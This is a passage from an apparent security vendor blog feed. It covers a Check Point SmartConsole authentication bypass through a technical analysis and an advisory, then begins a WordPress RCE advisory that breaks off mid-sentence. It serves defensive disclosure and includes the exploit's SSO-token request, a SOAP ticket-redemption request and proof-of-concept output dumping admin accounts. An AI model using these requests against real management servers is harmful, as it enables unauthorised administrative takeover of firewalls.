language="html">(
    :type (command)
    :subject (gen-sso-token)
    :body (
        :type (SmartConsole)
        :sso_original_client (SmartConsole
            :lower_name (system_admin)
            :soap_local_bind (1)
            :permissions ("ffffffff|ffffffff|ffffffff")
        )
    )
)</pre><p></p><p style="direction: ltr;"><span style='font-size: undefined;'>The native FWM authorization code has a special case for this command. If the current client is treated as a Check Point config administrator (which it will be), a </span><span style='color:rgb(24, 128, 56);font-size: undefined;'><span data-type='inlineCode'>gen-sso-token</span></span><span style='font-size: undefined;'> request is allowed before the normal permission mask check, as shown in </span><span style='color:rgb(24, 128, 56);font-size: undefined;'><span data-type='inlineCode'>[1]</span></span><span style='font-size: undefined;'> below. </span></p><p style="direction: ltr;"><span style='color:rgb(55, 71, 79);font-size: undefined;'></span></p><pre language="c">// Source: work/native_patch/t146/fw1/fw1/bin/fwm.full (fwm_is_authorized)

_BOOL4 __cdecl fwm_is_authorized(int a1, int a2, int a3)
{
int v3; // eax
int v4; // eax
int v5; // eax
bool v6; // zf
int v7; // edx
int v9; // [esp+14h] [ebp-34h]
int v10; // [esp+18h] [ebp-30h]
const char *v11; // [esp+1Ch] [ebp-2Ch]
_DWORD v12[7]; // [esp+2Ch] [ebp-1Ch] BYREF

  v11 = *(const char **)a2;
  v10 = CPMIGetClientPermission(a1);
  v12[0] = 0;
  v9 = CPMIGetClientAdvancedPermission(a1);
  fwobj_getint(a1, g_szCPMI_SOAP_LOCAL_BIND, v12);
  if ( v12[0] != 1 )
  {
    if ( is_fwmalert_client(a1) && strcmp(v11, "fwm-alert") )
      return 0;
    v3 = fwobj_safe_get(a1, g_szCPMI_LOWER_NAME);
    if ( strcmp(v11, "gen-sso-token") || !fwm_isCpconfigAdmin(v3) ) // &lt;-- [1]
    {
      // Normal command permission checks follow.
      // ...
      return 0;
    }
  }
  return 1;
}</pre><p></p><p style="direction: ltr;"><span style='font-size: undefined;'>The </span><span style='color:rgb(24, 128, 56);font-size: undefined;'><span data-type='inlineCode'>gen-sso-token</span></span><span style='font-size: undefined;'> response contains a new SSO ticket. The attacker then redeems that ticket through the normal SmartConsole SOAP login path. The request below shows only the fields that matter to this analysis:</span></p><p style="direction: ltr;"><span style='color:rgb(24, 128, 56);font-size: undefined;'></span></p><pre language="html">POST /cpmws/LoginSvcRemote HTTP/1.1
Host: 192.168.86.15:19009
Content-Type: text/xml; charset=utf-8
SOAPAction: ""

&lt;?xml version="1.0"?&gt;
&lt;soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"
 xmlns:l="http://www.checkpoint.com/DleWebService/LoginSvcRemote"
 xmlns:d="http://www.checkpoint.com/management/objects/schema/DleServerCoreSvc"
 xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"&gt;
  &lt;soap:Body&gt;
    &lt;l:loginNew&gt;
      &lt;d:loginRequest&gt;
        &lt;d:applicationName&gt;SmartConsole&lt;/d:applicationName&gt;
        &lt;d:domain&gt;a0eebc99-afed-4ef8-bb6d-fedfedfedfed&lt;/d:domain&gt;
        &lt;d:authenticationInfo xsi:type="d:UserSSOTokenAuthenticationInfo"&gt;
          &lt;d:username&gt;system_admin&lt;/d:username&gt;
          &lt;d:SSOToken&gt;512d49aa4c026d57177bea06dd28669c889479bfa8ea6d3b53fabe59ec9e0a2e&lt;/d:SSOToken&gt;
        &lt;/d:authenticationInfo&gt;
      &lt;/d:loginRequest&gt;
    &lt;/l:loginNew&gt;
  &lt;/soap:Body&gt;
&lt;/soap:Envelope&gt;</pre><p></p><p style="direction: ltr;"><span style='font-size: undefined;'>The </span><span style='color:rgb(24, 128, 56);font-size: undefined;'><span data-type='inlineCode'>loginNew</span></span><span style='font-size: undefined;'> response returns the two identifiers that SmartConsole uses for later requests:</span></p><p style="direction: ltr;"><span style='color:rgb(55, 71, 79);font-size: undefined;'></span></p><pre language="xml">&lt;loginNewResponse&gt;
  &lt;return&gt;
    &lt;clientSessionId&gt;ZMKhaQEsZ7bkMSlMVR7ARhvQIeTCdqwlvrcN-Ux4CvI&lt;/clientSessionId&gt;
    &lt;sid&gt;hRA3CPLRpTalxBIiv3miYGFlLy6JNHYQwqcKhD4Aktg&lt;/sid&gt;
  &lt;/return&gt;
&lt;/loginNewResponse&gt;</pre><p></p><p style="direction: ltr;"><span style='font-size: undefined;'>At this point, the attacker has moved from unauthenticated network access to a SmartConsole session identified by </span><span style='color:rgb(24, 128, 56);font-size: undefined;'><span data-type='inlineCode'>sid</span></span><span style='font-size: undefined;'> and </span><span style='color:rgb(24, 128, 56);font-size: undefined;'><span data-type='inlineCode'>clientSessionId</span></span><span style='font-size: undefined;'>. Ticket redemption is also the step that produces the advisory's log based IOC, with a message “Authentication method: application token” logged in the audit log, as shown in Figure 2 below.</span></p><p><span style='font-size: undefined;'></span></p><figure style="margin: 0"><img src="https://images.contentstack.io/v3/assets/blte4f029e766e6b253/blt7ef0990da2020f17/6a68f2e978b5fe23148ef294/figure2.png" position="center" class="embedded-asset" content-type-uid="sys_assets" type="asset" alt="figure2.png" asset-alt="figure2.png" style="text-align: center; width: auto" data-sys-asset-filelink="https://images.contentstack.io/v3/assets/blte4f029e766e6b253/blt7ef0990da2020f17/6a68f2e978b5fe23148ef294/figure2.png" data-sys-asset-uid="blt7ef0990da2020f17" data-sys-asset-filename="figure2.png" data-sys-asset-contenttype="image/png" data-sys-asset-alt="figure2.png" sys-style-type="display"/></figure><p style="text-align: center;"><span style='font-size: undefined;'><em>Figure 2: Audit Log IOC.</em></span></p><h2 style="direction: ltr;">Exploitation</h2><p style="direction: ltr;"><span style='font-size: undefined;'>Our </span><a href="https://github.com/sfewer-r7/CVE-2026-16232"><span style='font-size: undefined;'>PoC</span></a><span style='font-size: undefined;'> implements the minimum SIC/CPMI bootstrap needed to obtain the application token, mint the SmartConsole ticket, redeem it over SOAP, and display the results of several privileged operations before and after ticket redemption .</span></p><p></p><p style="direction: ltr;"><span style='font-size: undefined;'>The following shows our PoC running against a vulnerable R81.20 target.</span></p><p style="direction: ltr;"><span style='color:rgb(24, 128, 56);font-size: undefined;'></span></p><pre language="html">$ python3 CVE-2026-16232.py --target 192.168.86.15
[+] Targeting: 192.168.86.15
[+] SIC/CPMI connected
[+] Forged application DN: cn=cp_mgmt,o=gw-5622ca..5otbwa
[+] Application bind succeeded
[+] Application token obtained: XYB8PbLoXXnMx4J7W45UK-BhrjWkolvihp0P98G2qDc
[+] getServerInfo
    hostName: gw-5622ca
    hostIpAddress: 192.168.86.15
    osName: Linux
    osVersion: 3.10.0-1160.15.2cpx86_64
[+] Application token GetAllAdmins count: 0
[+] SmartConsole application-token ticket redeemed: 34bd621cc8855634fd97484fec258a18eb14eb8feb14b22c260a4accba715808
[+] GetAllAdmins count: 6
    admin: UNIX_PASSWORD
    Remote CPM Server_cn=cp_mgmt,o=gw-5622ca..5otbwa: INTERNAL_PASSWORD
    upgrade_cn=cp_mgmt,o=gw-5622ca..5otbwa: INTERNAL_PASSWORD
    admin_cn=cp_mgmt,o=gw-5622ca..5otbwa: INTERNAL_PASSWORD
    SmartView Reporter Client_cn=cp_mgmt,o=gw-5622ca..5otbwa: INTERNAL_PASSWORD
    CPM Server_cn=cp_mgmt,o=gw-5622ca..5otbwa: INTERNAL_PASSWORD</pre><p></p><p style="direction: ltr;"><span style='font-size: undefined;'>For the purpose of demonstrating the vulnerability and the level of access the authentication bypass achieves, the PoC uses the authentication bypass to access some protected resources. Specifically, the PoC retrieves some basic system information via a call to </span><span style='color:rgb(24, 128, 56);font-size: undefined;'><span data-type='inlineCode'>getServerInfo</span></span><span style='font-size: undefined;'>, and retrieves the SmartConsole admin accounts via a call to </span><span style='color:rgb(24, 128, 56);font-size: undefined;'><span data-type='inlineCode'>GetAllAdmins</span></span><span style='font-size: undefined;'>.</span></p><p></p><p style="direction: ltr;"><span style='font-size: undefined;'>First, the PoC uses the application token as a </span><span style='color:rgb(24, 128, 56);font-size: undefined;'><span data-type='inlineCode'>DLESESSIONID</span></span><span style='font-size: undefined;'> value for </span><span style='color:rgb(24, 128, 56);font-size: undefined;'><span data-type='inlineCode'>PerformanceTestSvcRemote.getServerInfo</span></span><span style='font-size: undefined;'>. The same SOAP method returns a fault without a valid session, while the application token returns the server information</span></p><p></p><p style="direction: ltr;"><span style='font-size: undefined;'>The PoC then sends the same </span><span style='color:rgb(24, 128, 56);font-size: undefined;'><span data-type='inlineCode'>GetAllAdmins</span></span><span style='font-size: undefined;'> query twice, once with the application token and once with the redeemed SmartConsole session.</span></p><p></p><p style="direction: ltr;"><span style='font-size: undefined;'>Using only the application token receives a successful query response with zero visible records, while using the redeemed SmartConsole session receives all records available.</span></p><p></p><p style="direction: ltr;"><span style='font-size: undefined;'>Running the same PoC against a patched R82.10 target shows the malicious application bind request failing.</span></p><p style="direction: ltr;"><span style='color:rgb(24, 128, 56);font-size: undefined;'></span></p><pre language="html">$ python3 CVE-2026-16232.py --target 192.168.86.16
[+] Targeting: 192.168.86.16
[+] SIC/CPMI connected
[+] Forged application DN: cn=cp_mgmt,o=gw-5622cc..tmbpin
[-] Application bind failed. The target is likely patched and not vulnerable.</pre><h2 style="direction: ltr;">Remediation</h2><p style="direction: ltr;"><span style='font-size: undefined;'>For remediation guidance, please see Rapid7’s Emergent Threat Response </span><a href="https://www.rapid7.com/blog/post/etr-cve-2026-16232-critical-check-point-smartconsole-authentication-bypass-exploited-in-the-wild/"><span style='font-size: undefined;'>blog</span></a><span style='font-size: undefined;'> for CVE-2026-16232 which contains further details.</span></p><p></p>]]></description>
      <link>https://www.rapid7.com/blog/post/ra-check-point-smartconsole-authentication-bypass-technical-analysis-cve-2026-16232</link>
      <guid isPermaLink="false">blt4939ca52fbe3c44f</guid>
      <category><![CDATA[Rapid7 Analysis]]></category>
      <category><![CDATA[Emergent Threat Response]]></category>
      <category><![CDATA[Labs]]></category><dc:creator><![CDATA[Stephen Fewer]]></dc:creator>
      <pubDate>Tue, 28 Jul 2026 18:32:03 GMT</pubDate><media:content url="https://images.contentstack.io/v3/assets/blte4f029e766e6b253/bltcbf09ec3af35e28e/6a15c63f08221ed5144dbf77/webinar-rapid7-logo.jpg" medium="image" />
    </item>
    <item>
      <title><![CDATA[CVE-2026-16232: Critical Check Point SmartConsole Authentication Bypass Exploited in the Wild]]></title>
      <description><![CDATA[<h2 style="direction: ltr;">Overview</h2><p style="direction: ltr;"><span style='font-size: undefined;'>On July 22, 2026, Check Point </span><a href="https://blog.checkpoint.com/security/security-advisory-action-required-active-exploitation-of-check-point-smartconsole-authentication-bypass-cve-2026-16232/"><span style='font-size: undefined;'>published a security advisory</span></a><span style='font-size: undefined;'> for multiple vulnerabilities affecting Security Management, Multi-Domain Management, and firewall products. The most urgent of these is </span><a href="https://www.rapid7.com/db/vulnerabilities/cve-2026-16232/"><span style='font-size: undefined;'>CVE-2026-16232</span></a><span style='font-size: undefined;'>, an authentication bypass in the SmartConsole login process classified as improper authentication (</span><a href="https://cwe.mitre.org/data/definitions/287.html"><span style='font-size: undefined;'>CWE-287</span></a><span style='font-size: undefined;'>). CVE-2026-16232 has been assigned a critical CVSS score of 9.1. The vulnerability allows an unauthenticated remote attacker to obtain an application login token and authenticate to the management server with full administrative privileges, enabling modification of security policies and configurations.</span></p><p style="direction: ltr;"><span style='font-size: undefined;'>Check Point has confirmed that CVE-2026-16232 is being actively exploited in the wild, affecting what the vendor describes as a small number of customers. Remote exploitation requires network access to the Management Server IP address in environments that do not restrict Trusted Clients. On the same day as the advisory, CVE-2026-16232 was </span><a href="https://www.cisa.gov/known-exploited-vulnerabilities-catalog?field_cve=CVE-2026-16232"><span style='font-size: undefined;'>added</span></a><span style='font-size: undefined;'> to the U.S. Cybersecurity and Infrastructure Security Agency's (CISA) list of known exploited vulnerabilities (KEV), with a remediation due date of July 25, 2026, giving organizations only three days to respond.</span></p><p style="direction: ltr;"><span style='font-size: undefined;'>The advisory addresses three vulnerabilities in total:</span></p><table><colgroup data-width='1250'><col style="width:21.451612903225804%"/><col style="width:15.96774193548387%"/><col style="width:24.35483870967742%"/><col style="width:20.48387096774194%"/><col style="width:17.741935483870968%"/></colgroup><thead><tr><th><p style="direction: ltr;"><span style='font-size: undefined;'><strong>CVE</strong></span></p></th><th><p style="direction: ltr;"><span style='font-size: undefined;'><strong>CVSS</strong></span></p></th><th><p style="direction: ltr;"><span style='font-size: undefined;'><strong>Description</strong></span></p></th><th><p style="direction: ltr;"><span style='font-size: undefined;'><strong>Affected Products</strong></span></p></th><th><p style="direction: ltr;"><span style='font-size: undefined;'><strong>Exploitation Status</strong></span></p></th></tr></thead><tbody><tr><td><p style="direction: ltr;"><span style='font-size: undefined;'>CVE-2026-16232</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>Vendor: 9.3 (Critical)</span><br/><span style='font-size: undefined;'>CISA: 9.1 (Critical)</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>Authentication bypass via SmartConsole application token</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>Security Management, Multi-Domain Management</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>Exploited in the wild</span></p></td></tr><tr><td><p style="direction: ltr;"><span style='font-size: undefined;'>CVE-2026-62144</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>Vendor: 9.3 (Critical)</span><br/><span style='font-size: undefined;'>CISA: 9.1 (Critical)</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>Management authentication bypass and privilege escalation</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>Security Management, Multi-Domain Management</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No known exploitation</span></p></td></tr><tr><td><p style="direction: ltr;"><span style='font-size: undefined;'>CVE-2026-62145</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>7.5 (High)</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>Local privilege escalation in GaiaOS WebUI</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>Firewall, Multi-Domain Management, Multi-Domain Log Server</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No known exploitation</span></p></td></tr></tbody></table><p></p><p style="direction: ltr;"><span style='font-size: undefined;'>Compromise of a Security Management Server is particularly consequential because it sits at the top of the trust hierarchy. An attacker with administrative access can modify security policies across managed gateways, alter administrator permissions, manipulate VPN configurations, and potentially disable or tamper with logging and monitoring. According to Check Point's </span><a href="https://blog.checkpoint.com/security/security-advisory-action-required-active-exploitation-of-check-point-smartconsole-authentication-bypass-cve-2026-16232/"><span style='font-size: undefined;'>advisory</span></a><span style='font-size: undefined;'>, the vulnerabilities were discovered during a routine internal review, with subsequent analysis revealing that CVE-2026-16232 had been exploited prior to the availability of a patch.</span></p><p style="direction: ltr;"><span style='font-size: undefined;'>Check Point network security products have been targeted by multiple in-the-wild vulnerabilities over the past two years. In June 2026, </span><a href="https://www.rapid7.com/db/vulnerabilities/cve-2026-50751/"><span style='font-size: undefined;'>CVE-2026-50751</span></a><span style='font-size: undefined;'>, a critical authentication bypass in Check Point Remote Access VPN, was exploited in the wild and added to the CISA KEV. In May 2024, </span><a href="https://www.rapid7.com/blog/post/2024/05/30/etr-cve-2024-24919-check-point-security-gateway-information-disclosure/"><span style='font-size: undefined;'>CVE-2024-24919</span></a><span style='font-size: undefined;'>, a high-severity information disclosure vulnerability in Check Point Quantum Security Gateways, was also exploited in the wild. Organizations running affected Check Point management products should apply the available hotfixes on an emergency basis.</span></p><h2 style="direction: ltr;">Technical analysis</h2><p style="direction: ltr;"><span style='font-size: undefined;'>On July 28, 2026, Rapid7 Labs published a full root cause </span><a href="https://www.rapid7.com/blog/post/ra-check-point-smartconsole-authentication-bypass-technical-analysis-cve-2026-16232/"><span style='font-size: undefined;'>technical analysis</span></a><span style='font-size: undefined;'> of CVE-2026-16232. Our analysis details the vulnerability and how an unauthenticated attacker can exploit the vulnerability to login to a vulnerable appliance via SmartConsole with full admin privileges.</span></p><h2 style="direction: ltr;">Mitigation guidance</h2><p style="direction: ltr;"><span style='font-size: undefined;'>Check Point released Jumbo Hotfixes on July 22, 2026, to remediate CVE-2026-16232, CVE-2026-62144, and CVE-2026-62145. Organizations running affected versions of Security Management or Multi-Domain Management should install the latest Jumbo Hotfix on an emergency basis, without waiting for a regular patch cycle to occur.</span></p><p style="direction: ltr;"><span style='font-size: undefined;'>The following versions are affected by CVE-2026-16232:</span></p><ul><li style="direction: ltr;"><p style="direction: ltr;"><span style='color:rgb(24, 128, 56);font-size: undefined;'>R82.10</span><span style='font-size: undefined;'>: fixed in Jumbo Hotfix Take 36 and later</span></p></li><li style="direction: ltr;"><p style="direction: ltr;"><span style='color:rgb(24, 128, 56);font-size: undefined;'>R82</span><span style='font-size: undefined;'>: fixed in Jumbo Hotfix Take 118 and later</span></p></li><li style="direction: ltr;"><p style="direction: ltr;"><span style='color:rgb(24, 128, 56);font-size: undefined;'>R81.20</span><span style='font-size: undefined;'>: fixed in Jumbo Hotfix Take 158 and later</span></p></li><li style="direction: ltr;"><p style="direction: ltr;"><span style='color:rgb(24, 128, 56);font-size: undefined;'>R81.10</span><span style='font-size: undefined;'>, </span><span style='color:rgb(24, 128, 56);font-size: undefined;'>R81</span><span style='font-size: undefined;'>, </span><span style='color:rgb(24, 128, 56);font-size: undefined;'>R80.30</span><span style='font-size: undefined;'>, </span><span style='color:rgb(24, 128, 56);font-size: undefined;'>R80.20</span><span style='font-size: undefined;'>, </span><span style='color:rgb(24, 128, 56);font-size: undefined;'>R80.10</span><span style='font-size: undefined;'>, </span><span style='color:rgb(24, 128, 56);font-size: undefined;'>R80</span><span style='font-size: undefined;'>, and </span><span style='color:rgb(24, 128, 56);font-size: undefined;'>R77.30</span><span style='font-size: undefined;'>: no fix specified</span></p></li></ul><p></p><p style="direction: ltr;"><span style='font-size: undefined;'>CVE-2026-62144 and CVE-2026-62145 affect the same release families (</span><span style='color:rgb(24, 128, 56);font-size: undefined;'>R81.10</span><span style='font-size: undefined;'>, </span><span style='color:rgb(24, 128, 56);font-size: undefined;'>R81.20</span><span style='font-size: undefined;'>, </span><span style='color:rgb(24, 128, 56);font-size: undefined;'>R82</span><span style='font-size: undefined;'>, </span><span style='color:rgb(24, 128, 56);font-size: undefined;'>R82.10</span><span style='font-size: undefined;'>) per the vendor advisory, with older versions also impacted.</span></p><p style="direction: ltr;"><span style='font-size: undefined;'>Smart-1 Cloud customers are already protected according to Check Point. For on-premises deployments where the hotfix cannot be applied immediately, Check Point recommends the following steps to reduce exposure:</span></p><ul><li style="direction: ltr;"><p style="direction: ltr;"><span style='font-size: undefined;'>Restrict Trusted Clients (GUI clients) to trusted IP addresses or subnets</span></p></li><li style="direction: ltr;"><p style="direction: ltr;"><span style='font-size: undefined;'>Protect Management access with a firewall and restrict access to trusted IP addresses</span></p></li><li style="direction: ltr;"><p style="direction: ltr;"><span style='font-size: undefined;'>Verify that implied rules for control connections are enabled</span></p></li></ul><p style="direction: ltr;"><span style='font-size: undefined;'>These mitigations reduce the attack surface, but they do not address the underlying vulnerability. Installing the Jumbo Hotfix remains the priority.</span></p><p style="direction: ltr;"><span style='font-size: undefined;'>Rapid7 strongly recommends investigating for signs of compromise even after applying the hotfix, particularly in environments where the Management Server has been accessible from the internet. Organizations should review administrator, SmartConsole, API, and application token activity, and search logs for the published indicators of compromise listed below.</span></p><p style="direction: ltr;"><span style='font-size: undefined;'>For the latest mitigation guidance, please refer to the vendor </span><a href="https://support.checkpoint.com/results/sk/sk185169"><span style='font-size: undefined;'>advisory</span></a><span style='font-size: undefined;'>.</span></p><h2 style="direction: ltr;">Rapid7 customers</h2><h3 style="direction: ltr;"><span style='color:rgb(67, 67, 67);'>Exposure Command, InsightVM, and Nexpose</span></h3><p style="direction: ltr;"><span style='font-size: undefined;'>Exposure Command, InsightVM, and Nexpose customers can assess exposure to CVE-2026-16232, CVE-2026-62144, CVE-2026-62145 with authenticated vulnerability checks available in the 24 July content release.</span></p><h2 style="direction: ltr;">Indicators of compromise</h2><p style="direction: ltr;"><span style='font-size: undefined;'>Check Point has published the following IP addresses associated with observed exploitation of CVE-2026-16232:</span></p><ul><li style="direction: ltr;"><p style="direction: ltr;"><span style='font-size: undefined;'>151.241.99[.]207</span></p></li><li style="direction: ltr;"><p style="direction: ltr;"><span style='font-size: undefined;'>151.241.99[.]233</span></p></li><li style="direction: ltr;"><p style="direction: ltr;"><span style='font-size: undefined;'>158.62.198[.]182</span></p></li><li style="direction: ltr;"><p style="direction: ltr;"><span style='font-size: undefined;'>192.142.10[.]99</span></p></li><li style="direction: ltr;"><p style="direction: ltr;"><span style='font-size: undefined;'>139.28.37[.]250</span></p></li><li style="direction: ltr;"><p style="direction: ltr;"><span style='font-size: undefined;'>194.213.18[.]137</span></p></li></ul><p></p><p style="direction: ltr;"><span style='font-size: undefined;'>Per the vendor, the presence of these indicators should prompt investigation, but the absence of these addresses does not confirm that an environment was unaffected.</span></p><h2 style="direction: ltr;">Updates</h2><ul><li style="direction: ltr;"><span style='font-size: undefined;'><strong>July 23, 2026</strong></span><span style='font-size: undefined;'>: Initial publication.</span></li><li style="direction: ltr;"><span style='font-size: undefined;'><strong>July 24, 2026: </strong></span><span style='font-size: undefined;'>Updated to reflect availability of vulnerability checks.</span></li><li><span style='font-size: undefined;'><strong>July 28, 2026:</strong></span><span style='font-size: undefined;'> Added a Technical analysis section for the new Rapid7 Analysis.</span></li></ul>]]></description>
      <link>https://www.rapid7.com/blog/post/etr-cve-2026-16232-critical-check-point-smartconsole-authentication-bypass-exploited-in-the-wild</link>
      <guid isPermaLink="false">blt5f866d03a6c8c994</guid>
      <category><![CDATA[Emergent Threat Response]]></category>
      <category><![CDATA[Labs]]></category>
      <category><![CDATA[Vulnerability Management]]></category><dc:creator><![CDATA[Rapid7]]></dc:creator>
      <pubDate>Thu, 23 Jul 2026 11:57:30 GMT</pubDate><media:content url="https://images.contentstack.io/v3/assets/blte4f029e766e6b253/blt65a432ba319f4043/6846abddaf18306debe6cf4d/ETR.webp" medium="image" />
    </item>
    <item>
      <title><![CDATA[CVE-2026-63030: wp2shell a Critical Remote Code Execution Vulnerability in WordPress Core]]></title>
      <description><![CDATA[<p></p><h2 style="direction: ltr;"><span style='font-size: undefined;'>Overview</span></h2><p style="direction: ltr;"><span style='font-size: undefined;'>On July 17, 2026, a GitHub Security Advisory was </span><a href="https://github.com/WordPress/wordpress-develop/security/advisories/GHSA-ff9f-jf42-662q"><span style='font-size: undefined;'>published</span></a><span style='font-size: undefined;'> for </span><a href="https://nvd.nist.gov/vuln/detail/CVE-2026-63030"><span style='font-size: undefined;'>CVE-2026-63030</span></a><span style='font-size: undefined;'>, a critical unauthenticated remote code execution vulnerability affecting </span><a href="https://wordpress.org/news/2026/07/wordpress-7-0-2-release/"><span style='font-size: undefined;'>WordPress Core</span></a><span style='font-size: undefined;'>. While the official GitHub security advisory classifies the severity as Critical, the vulnerability has currently been assigned a CVSS score of 7.5. WordPress is one of the most widely deployed content management systems, making vulnerabilities in its core software potentially significant for organizations operating public-facing websites. The vulnerability </span><a href="https://slcyber.io/research-center/wp2shell-pre-authentication-rce-in-wordpress-core/"><span style='font-size: undefined;'>reportedly allows</span></a><span style='font-size: undefined;'> an unauthenticated attacker to execute code via the WordPress REST API batch endpoint, potentially resulting in complete compromise of the website and its underlying data. No valid account or user interaction is required.</span></p><p style="direction: ltr;"><span style='font-size: undefined;'>According to the </span><a href="https://github.com/WordPress/wordpress-develop/security/advisories/GHSA-ff9f-jf42-662q"><span style='font-size: undefined;'>advisory</span></a><span style='font-size: undefined;'>, the vulnerability affects WordPress versions 6.9.0 through 6.9.4 and versions 7.0.0 through 7.0.1. The issue is fixed in WordPress 6.9.5 and 7.0.2. A fix is also included in WordPress 7.1 Beta 2.</span></p><p style="direction: ltr;"><span style='font-size: undefined;'>Cloudflare </span><a href="https://blog.cloudflare.com/wordpress-vulnerabilities/"><span style='font-size: undefined;'>reported</span></a><span style='font-size: undefined;'> that the vulnerable code path can be reached when a persistent object cache is not in use. Searchlight Cyber, whose researchers identified the vulnerability, stated that it can be exploited remotely against a default WordPress installation without requiring additional plugins.</span></p><p style="direction: ltr;"><span style='font-size: undefined;'><strong><em>Update, July 22:</em></strong></span><span style='font-size: undefined;'><strong> </strong></span><span style='font-size: undefined;'>Since initial publication, Searchlight Cyber has </span><a href="https://slcyber.io/research-center/exploit-brokers-pay-500000-for-a-wordpress-rce-i-found-one-with-gpt5-6/"><span style='font-size: undefined;'>published full technical details</span></a><span style='font-size: undefined;'> of the exploit chain, multiple public proof-of-concept exploits have surfaced, and both CVEs were added to CISA's Known Exploited Vulnerabilities (KEV) catalog on July 21 (</span><a href="https://nvd.nist.gov/vuln/detail/CVE-2026-63030"><span style='font-size: undefined;'>CVE-2026-63030</span></a><span style='font-size: undefined;'>, </span><a href="https://nvd.nist.gov/vuln/detail/CVE-2026-60137"><span style='font-size: undefined;'>CVE-2026-60137</span></a><span style='font-size: undefined;'>), confirming active exploitation.</span></p><h2 style="direction: ltr;">Technical overview</h2><p style="direction: ltr;"><span style='font-size: undefined;'>CVE-2026-63030 is a logic flaw in the WordPress REST API batch processor (</span><span style='color:rgb(24, 128, 56);font-size: undefined;'><span data-type='inlineCode'>/wp-json/batch/v1</span></span><span style='font-size: undefined;'>). The batch API performs validation and execution in separate loops. When </span><span style='color:rgb(24, 128, 56);font-size: undefined;'><span data-type='inlineCode'>wp_parse_url()</span></span><span style='font-size: undefined;'> fails on a sub-request path, the error is pushed to the validation array but not the matches array. This desynchronizes the arrays, causing every subsequent request to dispatch under the wrong handler.</span></p><p style="direction: ltr;"><span style='font-size: undefined;'>CVE-2026-60137 is a SQL injection in the </span><span style='color:rgb(24, 128, 56);font-size: undefined;'><span data-type='inlineCode'>author__not_in</span></span><span style='font-size: undefined;'> parameter of the posts endpoint. The parameter is interpolated directly into raw SQL when provided as a scalar string. Parameter validation normally prevents this, but the batch API desynchronization allows bypass. A recursive batch call bypasses GET restrictions, yielding pre-authentication UNION-based SQL injection.</span></p><p style="direction: ltr;"><span style='font-size: undefined;'>When both vulnerabilities are present, escalation to RCE chains WordPress internals to create an administrator account. The attacker logs in and uploads a malicious plugin for code execution. Neither vulnerability alone is sufficient for unauthenticated code execution. Searchlight Cyber's </span><a href="https://slcyber.io/research-center/exploit-brokers-pay-500000-for-a-wordpress-rce-i-found-one-with-gpt5-6/"><span style='font-size: undefined;'>full technical writeup</span></a><span style='font-size: undefined;'> details each step of the chain.</span></p><h2 style="direction: ltr;">Mitigation guidance</h2><p style="direction: ltr;"><span style='font-size: undefined;'>Organizations operating affected WordPress installations should prioritize upgrading immediately. Applying the WordPress-provided update is the most effective way to remediate CVE-2026-63030.</span></p><p style="direction: ltr;"><span style='font-size: undefined;'>Affected and fixed versions include:</span></p><p><span style='font-size: undefined;'></span></p><table><colgroup data-width='750'><col style="width:24.26229508196721%"/><col style="width:42.622950819672134%"/><col style="width:33.114754098360656%"/></colgroup><thead><tr><th><p style="direction: ltr;"><span style='font-size: undefined;'>WordPress branch</span></p></th><th><p style="direction: ltr;"><span style='font-size: undefined;'>Affected versions</span></p></th><th><p style="direction: ltr;"><span style='font-size: undefined;'>Fixed version</span></p></th></tr></thead><tbody><tr><td><p style="direction: ltr;"><span style='font-size: undefined;'>Earlier than 6.9</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>Not affected by CVE-2026-63030</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No action required for this CVE</span></p></td></tr><tr><td><p style="direction: ltr;"><span style='font-size: undefined;'>6.9</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>6.9.0 through 6.9.4</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>6.9.5</span></p></td></tr><tr><td><p style="direction: ltr;"><span style='font-size: undefined;'>7.0</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>7.0.0 through 7.0.1</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>7.0.2</span></p></td></tr><tr><td><p style="direction: ltr;"><span style='font-size: undefined;'>7.1 beta</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>Affected beta versions were not fully specified</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>7.1 Beta 2</span></p></td></tr></tbody></table><p style="direction: ltr;"><span style='font-size: undefined;'></span></p><p><span style='font-size: undefined;'>WordPress maintainers </span><a href="https://wordpress.org/news/2026/07/wordpress-7-0-2-release/"><span style='font-size: undefined;'>stated</span></a><span style='font-size: undefined;'> they are forcing updates for affected installations with automatic updates enabled. Administrators should nevertheless verify that each internet-facing WordPress website has successfully upgraded to WordPress 6.9.5, 7.0.2, or another fixed release appropriate for its branch.</span></p><p style="direction: ltr;"><span style='font-size: undefined;'>As a temporary mitigation, organizations that cannot immediately update can block the </span><span style='color:rgb(24, 128, 56);font-size: undefined;'><span data-type='inlineCode'>/wp-json/batch/v1</span></span><span style='font-size: undefined;'> endpoint (or </span><span style='color:rgb(24, 128, 56);font-size: undefined;'><span data-type='inlineCode'>?rest_route=/batch/v1</span></span><span style='font-size: undefined;'>) at a web application firewall, or disable anonymous REST API access using a plugin.</span></p><p style="direction: ltr;"><span style='font-size: undefined;'>Given confirmed exploitation in the wild, Rapid7 strongly recommends investigating for signs of compromise even after patching. Defenders should review HTTP access logs for anomalous batch endpoint requests and check for unfamiliar plugins or PHP files.</span></p><h2 style="direction: ltr;">Rapid7 customers</h2><h3 style="direction: ltr;">Exposure Command, InsightVM, and Nexpose</h3><p style="direction: ltr;"><span style='font-size: undefined;'>Exposure Command, InsightVM, and Nexpose customers can assess exposure to CVE-2026-63030 with unauthenticated vulnerability checks available in the July 20th, 2026 